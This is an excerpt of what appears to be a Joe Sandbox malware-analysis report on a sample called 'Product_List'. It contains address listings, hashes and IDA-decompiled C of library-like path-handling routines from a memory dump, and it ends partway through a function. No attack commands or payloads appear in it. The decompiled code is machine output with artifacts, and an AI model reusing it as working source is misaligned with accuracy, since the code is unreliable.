                                                      0x01835fce
                                                      0x01835fd4
                                                      0x01835fdc
                                                      0x01835fec
                                                      0x01835fed
                                                      0x01835fee
                                                      0x01835fef
                                                      0x01835ff9
                                                      0x01835ffa
                                                      0x01835ffb
                                                      0x01835ffc
                                                      0x01836000
                                                      0x01836004
                                                      0x01836012
                                                      0x01836012
                                                      0x01836018
                                                      0x01836019
                                                      0x0183601a
                                                      0x0183601b
                                                      0x0183601c
                                                      0x01836020
                                                      0x01836059
                                                      0x0183605c
                                                      0x01836061
                                                      0x01836061
                                                      0x01836022
                                                      0x01836022
                                                      0x01836022
                                                      0x01836025
                                                      0x0183602a
                                                      0x0183602b
                                                      0x01836031
                                                      0x01836037
                                                      0x01836038
                                                      0x0183603e
                                                      0x01836048
                                                      0x01836049
                                                      0x0183604a
                                                      0x0183604b
                                                      0x0183604c
                                                      0x0183604d
                                                      0x01836053
                                                      0x01836054
                                                      0x01836054
                                                      0x01836062
                                                      0x01836065
                                                      0x01836067
                                                      0x0183606a
                                                      0x01836070
                                                      0x01836075
                                                      0x01836076
                                                      0x01836081
                                                      0x01836087
                                                      0x01836095
                                                      0x01836099
                                                      0x0183609e
                                                      0x018360a4
                                                      0x018360ae
                                                      0x018360b0
                                                      0x018360b3
                                                      0x018360b6
                                                      0x018360b8
                                                      0x018360ba
                                                      0x018360ba
                                                      0x018360ba
                                                      0x018360ba
                                                      0x018360be
                                                      0x018360c0
                                                      0x018360c5
                                                      0x018360c5
                                                      0x018360c5
                                                      0x018360c6
                                                      0x018360cd
                                                      0x01836114
                                                      0x018360cf
                                                      0x018360cf
                                                      0x018360d4
                                                      0x018360d5
                                                      0x018360da
                                                      0x018360db
                                                      0x018360e1
                                                      0x018360e2
                                                      0x018360e8
                                                      0x018360f8
                                                      0x018360fd
                                                      0x018360fe
                                                      0x01836102
                                                      0x01836104
                                                      0x01836107
                                                      0x01836109
                                                      0x0183610b
                                                      0x0183610b
                                                      0x0183610b
                                                      0x0183610b
                                                      0x0183610f
                                                      0x0183610f
                                                      0x01836117
                                                      0x0183611a
                                                      0x0183611f
                                                      0x01836125
                                                      0x01836134
                                                      0x01836139
                                                      0x0183613f
                                                      0x01836146
                                                      0x01836148
                                                      0x0183614b
                                                      0x0183614d
                                                      0x0183614f
                                                      0x0183614f
                                                      0x0183614f
                                                      0x0183614f
                                                      0x01836153
                                                      0x01836159
                                                      0x01836159
                                                      0x0183615c
                                                      0x01836163
                                                      0x01836169
                                                      0x0183616c
                                                      0x01836172
                                                      0x01836181
                                                      0x01836186
                                                      0x01836187
                                                      0x0183618b
                                                      0x01836191
                                                      0x01836195
                                                      0x018361a3
                                                      0x018361bb
                                                      0x018361c0
                                                      0x018361c3
                                                      0x018361cc
                                                      0x018361d0
                                                      0x018361dc
                                                      0x018361de
                                                      0x018361e1
                                                      0x018361e4
                                                      0x018361e6
                                                      0x018361e8
                                                      0x018361e8
                                                      0x018361e8
                                                      0x018361e8
                                                      0x018361e6
                                                      0x018361ec
                                                      0x018361f3
                                                      0x01836203
                                                      0x01836209
                                                      0x0183620a
                                                      0x01836216
                                                      0x0183621d
                                                      0x01836227
                                                      0x01836241
                                                      0x01836246
                                                      0x0183624c
                                                      0x01836257
                                                      0x01836259
                                                      0x0183625c
                                                      0x0183625e
                                                      0x01836260
                                                      0x01836260
                                                      0x01836260
                                                      0x01836260
                                                      0x0183625e
                                                      0x01836264
                                                      0x01836267
                                                      0x01836269
                                                      0x01836315
                                                      0x01836315
                                                      0x0183631b
                                                      0x0183631e
                                                      0x01836324
                                                      0x01836327
                                                      0x0183632f
                                                      0x01836330
                                                      0x01836333
                                                      0x0183633a
                                                      0x0183633c
                                                      0x01836335
                                                      0x01836335
                                                      0x01836335
                                                      0x0183633f
                                                      0x01836342
                                                      0x0183634c
                                                      0x01836352
                                                      0x01836355
                                                      0x01836355
                                                      0x01836359
                                                      0x00000000
                                                      0x0183626f
                                                      0x01836275
                                                      0x01836275
                                                      0x01836278
                                                      0x0183627e
                                                      0x0183627e
                                                      0x01836281
                                                      0x01836287
                                                      0x0183628d
                                                      0x01836298
                                                      0x0183629c
                                                      0x018362a2
                                                      0x0183629e
                                                      0x0183629e
                                                      0x0183629e
                                                      0x018362a7
                                                      0x018362a7
                                                      0x018362aa
                                                      0x018362b0
                                                      0x018362f0
                                                      0x018362f0
                                                      0x018362f2
                                                      0x018362f8
                                                      0x018362fd
                                                      0x018362b2
                                                      0x018362b2
                                                      0x018362b2
                                                      0x018362b5
                                                      0x018362dd
                                                      0x018362e2
                                                      0x018362e5
                                                      0x018362b7
                                                      0x018362b8
                                                      0x018362bb
                                                      0x018362bd
                                                      0x018362c0
                                                      0x018362c4
                                                      0x018362cd
                                                      0x018362cd
                                                      0x018362c0
                                                      0x018362bb
                                                      0x018362b5
                                                      0x01836302
                                                      0x01836303
                                                      0x01836305
                                                      0x01836305
                                                      0x01836305
                                                      0x0183630c
                                                      0x0183630c
                                                      0x00000000
                                                      0x0183627e
                                                      0x01836269
                                                      0x01835eac
                                                      0x01835ebb
                                                      0x01835ebe
                                                      0x01835ecb
                                                      0x01835ecb
                                                      0x01835ece
                                                      0x01835ece
                                                      0x01835ed4
                                                      0x01835ed7
                                                      0x01835ed9
                                                      0x01835edb
                                                      0x01835edb
                                                      0x01835ee1
                                                      0x01835ee1
                                                      0x01835ee3
                                                      0x01835f20
                                                      0x01835f20
                                                      0x01835ee5
                                                      0x01835ee5
                                                      0x01835ee5
                                                      0x01835ee8
                                                      0x01835f11
                                                      0x01835f18
                                                      0x01835eea
                                                      0x01835eea
                                                      0x01835eed
                                                      0x01835ef2
                                                      0x01835ef8
                                                      0x01835efb
                                                      0x01835f0a
                                                      0x01835f0a
                                                      0x01835eed
                                                      0x01835ee8
                                                      0x01835f22
                                                      0x01835f28
                                                      0x00000000
                                                      0x00000000
                                                      0x01835f30
                                                      0x01835f31
                                                      0x01835f37
                                                      0x01835f3a
                                                      0x01835f3d
                                                      0x01835f44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01835f46
                                                      0x01835f48
                                                      0x01835f4d
                                                      0x00000000
                                                      0x01835f4d
                                                      0x01835dda
                                                      0x01835ddf
                                                      0x00000000
                                                      0x01835ddf
                                                      0x01835dd8
                                                      0x01835da7
                                                      0x01835da9
                                                      0x01835dac
                                                      0x01835dae
                                                      0x00000000
                                                      0x01835db4
                                                      0x01835db4
                                                      0x00000000
                                                      0x01835db4
                                                      0x01835dae
                                                      0x01835d88
                                                      0x01835d8d
                                                      0x01836363
                                                      0x01836369
                                                      0x0183636a
                                                      0x01836370
                                                      0x01836372
                                                      0x0183637a
                                                      0x0183637b
                                                      0x0183637d
                                                      0x00000000
                                                      0x00000000
                                                      0x0183637f
                                                      0x01836385
                                                      0x00000000
                                                      0x01836385
                                                      0x01835d38
                                                      0x01835d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01835d3b
                                                      0x01835d27
                                                      0x01835d29
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01836360
                                                      0x00000000
                                                      0x01836360
                                                      0x01835c10
                                                      0x01835c10
                                                      0x018363da
                                                      0x018363e5
                                                      0x018363e5

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d1d346e5a6863641e63b6d4503c58449543d80eb9eb78e52bc45ead7ee38a46
                                                      • Instruction ID: fec2841dd038cbf39b0e4cc3cde0b36cd33e3eabe1d12866325c847fae0b61ac
                                                      • Opcode Fuzzy Hash: 7d1d346e5a6863641e63b6d4503c58449543d80eb9eb78e52bc45ead7ee38a46
                                                      • Instruction Fuzzy Hash: 4F422075D00219DFDB24CF68C880BA9BBB1FF85304F1981A9D94DEB242E7749A85CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01784120 Relevance: .4, Instructions: 444COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E01784120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x185d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0179F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = L01786E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01784620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = L01786E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M017845F8))) {
												case 0:
													_v568 = 0x1741078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x17411c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01784620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															L017AF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															L017AF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E017652A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0177EB70(1, 0x18579a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0177AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E017A95D0();
																			L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return L017AB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E017A3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return L017AB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                      0x01784128
                                                      0x01784135
                                                      0x0178413c
                                                      0x01784141
                                                      0x01784145
                                                      0x01784147
                                                      0x0178414e
                                                      0x01784151
                                                      0x01784159
                                                      0x0178415c
                                                      0x01784160
                                                      0x01784164
                                                      0x01784168
                                                      0x0178416c
                                                      0x0178417f
                                                      0x01784181
                                                      0x0178446a
                                                      0x0178446a
                                                      0x0178418c
                                                      0x01784195
                                                      0x01784199
                                                      0x01784432
                                                      0x01784439
                                                      0x0178443d
                                                      0x01784442
                                                      0x01784447
                                                      0x00000000
                                                      0x0178419f
                                                      0x017841a3
                                                      0x017841b1
                                                      0x017841b9
                                                      0x017841bd
                                                      0x017845db
                                                      0x017845db
                                                      0x00000000
                                                      0x017841c3
                                                      0x017841c3
                                                      0x017841ce
                                                      0x017841d4
                                                      0x017ce138
                                                      0x017ce13e
                                                      0x017ce169
                                                      0x017ce16d
                                                      0x017ce19e
                                                      0x017ce16f
                                                      0x017ce16f
                                                      0x017ce175
                                                      0x017ce179
                                                      0x017ce18f
                                                      0x017ce193
                                                      0x00000000
                                                      0x017ce199
                                                      0x00000000
                                                      0x017ce199
                                                      0x017ce193
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017841da
                                                      0x017841da
                                                      0x017841df
                                                      0x017841e4
                                                      0x017841ec
                                                      0x01784203
                                                      0x01784207
                                                      0x017ce1fd
                                                      0x01784222
                                                      0x01784226
                                                      0x017ce1f3
                                                      0x017ce1f3
                                                      0x0178422c
                                                      0x0178422c
                                                      0x01784233
                                                      0x017ce1ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01784239
                                                      0x01784239
                                                      0x01784239
                                                      0x01784239
                                                      0x01784233
                                                      0x01784226
                                                      0x017841ee
                                                      0x017841ee
                                                      0x017841f4
                                                      0x01784575
                                                      0x017ce1b1
                                                      0x017ce1b1
                                                      0x00000000
                                                      0x0178457b
                                                      0x0178457b
                                                      0x01784582
                                                      0x017ce1ab
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01784588
                                                      0x01784588
                                                      0x0178458c
                                                      0x017ce1c4
                                                      0x017ce1c4
                                                      0x00000000
                                                      0x01784592
                                                      0x01784592
                                                      0x01784599
                                                      0x017ce1be
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0178459f
                                                      0x0178459f
                                                      0x017845a3
                                                      0x017ce1d7
                                                      0x017ce1e4
                                                      0x00000000
                                                      0x017845a9
                                                      0x017845a9
                                                      0x017845b0
                                                      0x017ce1d1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017845b6
                                                      0x017845b6
                                                      0x017845b6
                                                      0x00000000
                                                      0x017845b6
                                                      0x017845b0
                                                      0x017845a3
                                                      0x01784599
                                                      0x0178458c
                                                      0x01784582
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017841f4
                                                      0x0178423e
                                                      0x01784241
                                                      0x017845c0
                                                      0x017845c4
                                                      0x00000000
                                                      0x017845ca
                                                      0x017845ca
                                                      0x00000000
                                                      0x017ce207
                                                      0x017ce20f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017845d1
                                                      0x00000000
                                                      0x00000000
                                                      0x017845ca
                                                      0x00000000
                                                      0x01784247
                                                      0x01784247
                                                      0x01784247
                                                      0x01784249
                                                      0x01784249
                                                      0x01784249
                                                      0x01784251
                                                      0x01784251
                                                      0x01784257
                                                      0x0178425f
                                                      0x0178426e
                                                      0x01784270
                                                      0x0178427a
                                                      0x017ce219
                                                      0x017ce219
                                                      0x01784280
                                                      0x01784282
                                                      0x01784456
                                                      0x017845ea
                                                      0x00000000
                                                      0x017845f0
                                                      0x017ce223
                                                      0x00000000
                                                      0x017ce223
                                                      0x0178445c
                                                      0x0178445c
                                                      0x00000000
                                                      0x0178445c
                                                      0x00000000
                                                      0x01784288
                                                      0x0178428c
                                                      0x017ce298
                                                      0x01784292
                                                      0x01784292
                                                      0x0178429e
                                                      0x017842a3
                                                      0x017842a7
                                                      0x017842ac
                                                      0x017ce22d
                                                      0x017842b2
                                                      0x017842b2
                                                      0x017842b9
                                                      0x017842bc
                                                      0x017842c2
                                                      0x017842ca
                                                      0x017842cd
                                                      0x017842cd
                                                      0x017842d4
                                                      0x0178433f
                                                      0x0178433f
                                                      0x017842d6
                                                      0x017842d6
                                                      0x017842d9
                                                      0x017842dd
                                                      0x017842eb
                                                      0x017ce23a
                                                      0x017842f1
                                                      0x01784305
                                                      0x0178430d
                                                      0x01784315
                                                      0x01784318
                                                      0x0178431f
                                                      0x01784322
                                                      0x0178432e
                                                      0x0178433b
                                                      0x0178433b
                                                      0x00000000
                                                      0x0178432e
                                                      0x017842eb
                                                      0x0178434c
                                                      0x0178434e
                                                      0x01784352
                                                      0x01784359
                                                      0x0178435e
                                                      0x01784361
                                                      0x0178436e
                                                      0x0178438a
                                                      0x0178438e
                                                      0x01784396
                                                      0x0178439e
                                                      0x017843a1
                                                      0x017843ad
                                                      0x017843bb
                                                      0x017843bb
                                                      0x017843ad
                                                      0x0178436e
                                                      0x017843bf
                                                      0x017843c5
                                                      0x01784463
                                                      0x01784463
                                                      0x017843ce
                                                      0x017843d5
                                                      0x017843d9
                                                      0x017843df
                                                      0x01784475
                                                      0x01784479
                                                      0x01784491
                                                      0x01784491
                                                      0x01784479
                                                      0x017843e5
                                                      0x017843eb
                                                      0x017843f4
                                                      0x017843f6
                                                      0x017843f9
                                                      0x017843fc
                                                      0x017843ff
                                                      0x017844e8
                                                      0x017844ed
                                                      0x017844f3
                                                      0x017ce247
                                                      0x00000000
                                                      0x017844f9
                                                      0x01784504
                                                      0x01784508
                                                      0x0178450f
                                                      0x017ce269
                                                      0x00000000
                                                      0x01784515
                                                      0x01784519
                                                      0x01784531
                                                      0x01784534
                                                      0x01784537
                                                      0x0178453e
                                                      0x01784541
                                                      0x0178454a
                                                      0x017ce255
                                                      0x017ce255
                                                      0x017ce25b
                                                      0x017ce25e
                                                      0x017ce261
                                                      0x017ce261
                                                      0x01784555
                                                      0x01784559
                                                      0x0178455d
                                                      0x017ce26d
                                                      0x017ce270
                                                      0x017ce274
                                                      0x017ce27a
                                                      0x017ce27d
                                                      0x017ce28e
                                                      0x017ce28e
                                                      0x01784563
                                                      0x01784563
                                                      0x01784569
                                                      0x01784569
                                                      0x00000000
                                                      0x0178455d
                                                      0x0178450f
                                                      0x00000000
                                                      0x017844f3
                                                      0x017843ff
                                                      0x01784405
                                                      0x01784405
                                                      0x01784405
                                                      0x017842ac
                                                      0x0178428c
                                                      0x01784282
                                                      0x01784407
                                                      0x0178440d
                                                      0x017ce2af
                                                      0x017ce2af
                                                      0x01784413
                                                      0x01784413
                                                      0x00000000
                                                      0x017841d4
                                                      0x00000000
                                                      0x017841c3
                                                      0x017841bd
                                                      0x01784415
                                                      0x01784415
                                                      0x01784416
                                                      0x01784417
                                                      0x01784429
                                                      0x0178416e
                                                      0x0178416e
                                                      0x01784175
                                                      0x01784498
                                                      0x0178449f
                                                      0x017ce12d
                                                      0x00000000
                                                      0x017ce133
                                                      0x00000000
                                                      0x017ce133
                                                      0x017844a5
                                                      0x017844a5
                                                      0x017844aa
                                                      0x00000000
                                                      0x017844bb
                                                      0x017844ca
                                                      0x017844d6
                                                      0x017844d7
                                                      0x017844d8
                                                      0x017844e3
                                                      0x017844e3
                                                      0x017844aa
                                                      0x0178417b
                                                      0x0178417b
                                                      0x0178417b
                                                      0x00000000
                                                      0x0178417b
                                                      0x01784175
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d45911fda3581be045de489a38769a56b79655574462151619c8cf44f4811036
                                                      • Instruction ID: 8635e1376940e102de6721d15514f569ac7761ee67c3cfab093c9ed3d1e466b7
                                                      • Opcode Fuzzy Hash: d45911fda3581be045de489a38769a56b79655574462151619c8cf44f4811036
                                                      • Instruction Fuzzy Hash: 30F17B706482128BC724EF18C484B3AFBE1FF98714F14496EF98ACB291E774D991CB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017920A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E017920A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1858714; // 0x0
